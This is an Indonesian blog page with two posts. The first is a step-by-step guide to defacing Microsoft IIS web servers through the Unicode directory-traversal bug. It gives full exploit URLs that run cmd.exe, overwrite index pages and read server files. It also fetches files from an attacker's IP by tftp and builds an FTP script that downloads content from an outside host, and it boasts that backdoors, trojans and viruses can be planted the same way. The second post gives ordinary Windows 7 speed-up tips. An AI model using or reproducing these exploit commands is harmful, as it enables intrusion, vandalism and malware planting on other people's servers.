Friday, 17 April 2015

deface lewat cmd



deface melalui CmD

1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh–>> www.target.com
2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode —>> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS target –>>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0×2140 JIS X 0208
0×22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam – Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.) Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang – orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrooti ndex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo”
This Web Site Hacking BY ….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
“+>+c:inepubwwwrootindex.htm
/c+echo”
This Web Site Hacking BY ….:::J.A.N.G.K.|.K:…
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
“+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda ”
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah ‘type’ :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.
C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) —->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com —>>> scriptnya —>> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik —>> user name —>>> scriptnya –>> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang —>>> password —>>> scriptnya –>> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot —>>> folder tujuan —>>> scriptnya –>>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii —>>> bentuk file —>>> scripnya —>>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm —->>> command tranfer file —>>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close —>> perintah dc ke web server —->>> scripnya —>>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh……….
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary.
CREATED BY:  screAMz

Wednesday, 8 April 2015

Dalam kesempatan kali ini saya akan berbagi tentang Cara atau Tips untuk mempercepat kinerja komputer windows 7, kadang kala kita jengkel ketika kinerja/ performa windows 7 kita lemot. Sehingga dapat mengakibatkan bad mood/ pekerjaan yang harusnya dapat terselesaikan dengan tepat waktu jadi molor dikarenakan masalah komputer yang lelet/ lemot.
Di bawah ini adalah Tips atau Cara untuk mempercepat windows 7:
1. Anda MatikanVisual efek yang tidak anda perlukan/ tidak penting.
Fungsi dari Visual efek adalah digunakan untuk membuat tampilan windows menjadi  cantik, namun Visual efek memiliki pengaruh terhadap performa/ kinerja komputer. Sehingga jika Visual efek dinonaktifkan pastinya akan berpengaruh terhadap kinerja laptop atau komputer anda menjadi lebih cepat. Di bawah ini adalah langkah-langkah yang dapat digunakan untuk menonaktifkan/ mematikan visual efek pada windows 7 
• Pertama anda Klik Start -> Kemudian klik kanan pada Computer -> lalu klik properties -> klik Advance system setting -> pilih tab advanced -> pada bagian performance anda klik setting.
Tips Cara mempercepat kinerja komputer windows 7

• Di bagian Visual efek anda pilih adjust for best performance -> setelah itu klik OK

2. Non aktifkan/ Matikan aero shake.
Tips Cara mempercepat kinerja komputer windows 7

Fungsi dari Fitur aero shake ini adalah untuk meminimize window yang sedang tidak di jalankan. Misalnya anda membuka beberapa window, jika salah satu window yang aktif  itu anda gerak-gerakkan, maka secara otomatis jendela yang lainnya akan di minimize. Di bawah ini adalah cara untuk mematikan fitur aero shake:
• Anda Klik Start -> setelah itu ketik “gpedit.msc” (tidak pakai tanda petik) setelah itu tekan tombol enter.
• Jika sudah tampil jendela local group policy editor seperti di atas, Lalu Klik User Configuration -> Klik administrative template -> klik desktop -> setelah itu di window/ jendela bagian kanan anda klik dua kali di “turn off aero shake windows minimizing mouse gesture” -> Jika sudah pilih enable -> yang terakhir klik OK.

3. Yang ke tiga tentang Tips atau Cara untuk mempercepat windows 7 adalah Memtaikan firut aero snap.
Berikut ini adalah caranya:
Tips Cara mempercepat kinerja komputer windows 7

• Pertama anda Klik Start -> Kemudian Klik control panel -> Setelah itu pilih ease of acces -> lalu klik ease of acces center > klik Make the mouse easier to use.
• Kasih tanda centang di “Prevent windows from being automatically arranged when to the edge of the screen” -> Setelah itu Klik OK.

4. Pada saat startup anda matikan aplikasi yang tidak begitu diperlukan di komputer atau laptop (ketika baru menyala).
Cara untuk mematikannya yaitu sebagai berikut ini:
Tips Cara mempercepat kinerja komputer windows 7

• Pilih Start -> lalu ketik “msconfig” (hilangkan tanda petik) setelah itu tekan enter -> klik tab startup -> setelah itu hilangkan tanda centang aplikasi yang tidak begitu dibutuhkan untuk dijalankan ketika komputer sedang startup. Klik OK.

5. Yang ke 5, Cara atau Tips untuk mempercepat windows 7 yaitu menonaktifkan gadget pada windows 7.
Berikut ini adalah cara untuk mematikan gadget di windows 7 yang bisa dilakukan
• Anda kjlik Start -> Setelah itu klik Control Panel -> Pilih Programs -> Pilih Turn Windows features on or off  -> Setelah itu uncheck/ buang tanda centang pada “Windows gadget platform" -> kemudian Klik OK.

6. Pada saat booting menggunakan semua core. 
Apabila anda mempunyai laptop/ komputer yang memiliki processor dengan banyak core, lebih baik anda menggunakan semua core tersebut ketika komputer melakukan booting.
Tahap-tahap untuk mengatur supaya semua core processor anda digunakan ketika komputer melakukan booting dapat anda lakukan dengan cara berikut ini:
Tips Cara mempercepat kinerja komputer windows 7

• Klik Start -> setelah itu ketik “msconfig” (tidak ada tanda petik) ->  kemudian tekan enter 
• Klik pada tab -> boot > setelah itu pilih system operasi windows 7.
• Selanjutnya klik advanced options -> kasih tanda centang pada Number of processor -> lalu pilih jumlah processor -> kemudian klik OK.

7. Selanjutnya pada hardisk anda lakukan Disk Clean Up.
Apakah anda sudah tahu, jika anda melakukan browsing/ menginstall dan menguninstall aplikasi dari komputer anda akan menghasilkan registry-registry, cache, cookies yang baru yang biasanya tidak digunakan. Jika  anda tidak pernah membersihkanya, maka jumlah file akan makin banyak sehingga akan memakan banyak penggunaan Hard Disk anda. Untuk melakukan Disk Clean Up bisa anda lakukan dengan cara sebagai berikut:
• Anda klik Start -> Klik All Programs -> Klik Accesories -> Kemudian Klik System Tools -> Setelah itu Klik Disk Clean Up. 
• Maka akan pilihan untuk memilih partisi Harddisk yang akan dilakukan Clean Up. (pilih drive : C) -> Setelah itu klik OK.
Tips Cara mempercepat kinerja komputer windows 7

• Berikan tanda centang pada bagian yang ingin anda Clean Up. lalu Klik OK.

8. Lakukan Defragment Disk dengan teratur.
Proses defragment pada dasarnya adalah merapikan file yang berada di harddisk sehingga komputer akan menjadi lebih mudah membacanya.. 
Untuk melakukan defragment Disk dapat dilakukan dengan cara berikut:
• Pilih Start -> Kemudian klik All Programs -> Selanjurnya anda klik Accesories -> Kemudian Klik System Tools -> Lalu klik Disk Defragmenter. 
• Selanjutnya anda pilih Hard Drive yang ingin anda defrag lalu anda klik defragment disk.
Tips Cara mempercepat kinerja komputer windows 7

9. Nonaktifkan System Sound.
Apabila anda tidak menonaktifkan system sound makan akan membuat proses loading system menjadi cepat.
Untuk mematikan system sound adalah sebagai berikut ini:
• Anda klik Start -> Kemudian ketik "mmsys.cpl" (tanpa tanda petik) lalu tekan tombol enter.
• Anda buka tab Sound kemudian pilih No Sound 
• Klik OK 
10. Untuk mempercepat kinerja windows 7 anda dapat menonaktifkan Index Search di Windows 7.  
• Pilih start -> Kemudian ketik "services.msc" (tanpa tanda petik) Setelah itu tekan enter.
• Cari Windows Search lalu klik kanan kemudian nonaktifkan service tersebut.
11. Bersihkan/ Hapus isi folder “Prefecth”.
Cara yang ke-11 untuk meningkatkan kinerja komputer windows 7 yaitu dengan menghapus isi folder prefetch.
Caranya adalah sebagai berikut ini:
Buka Windows Explorer  caranya Klik kanan pada Start -> pilih Windows Explorer -> Setelah itu Drive C -> Kemudian klik Windows -> Kemudian Klik Prefetch > Hapus seluruh isi yang terdapat di dalam folder prefetch tersebut secara permanen dengun cara memakai kombinasi tombol (Shift + Del).
Bagi anda pengguna Windows 8, silahkan anda baca artikel: Cara Efektif Agar Windows 8 Lebih Cepat.  
Itulah yang bisa saya sampaikan tentang Cara atau Tips untuk mempercepat kinerja komputer windows 7.